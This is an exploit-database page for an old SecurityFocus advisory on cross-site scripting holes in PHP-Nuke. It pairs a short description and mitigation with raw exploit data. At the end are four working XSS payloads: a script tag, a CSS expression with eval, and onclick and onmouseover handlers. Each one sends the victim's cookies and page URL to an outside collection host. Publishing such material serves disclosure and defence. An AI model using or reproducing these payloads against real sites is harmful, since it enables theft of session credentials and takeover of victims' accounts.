header-logo
Suggest Exploit
vendor:
PHP-Nuke
by:
SecurityFocus
7.5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: PHP-Nuke
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

PHP-Nuke Cross Site Scripting Vulnerabilities

Several cross site scripting vulnerabilities have been reported for PHP-Nuke. An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied HTML and script code may be executed on a web client in the context of the site hosting the web-based forum. Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious HTML or script code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6244/info

everal cross site scripting vulnerabilities have been reported for PHP-Nuke.

An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied HTML and script code may be executed on a web client in the context of the site hosting the web-based forum.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;

<B
STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/
fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+
document.cookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>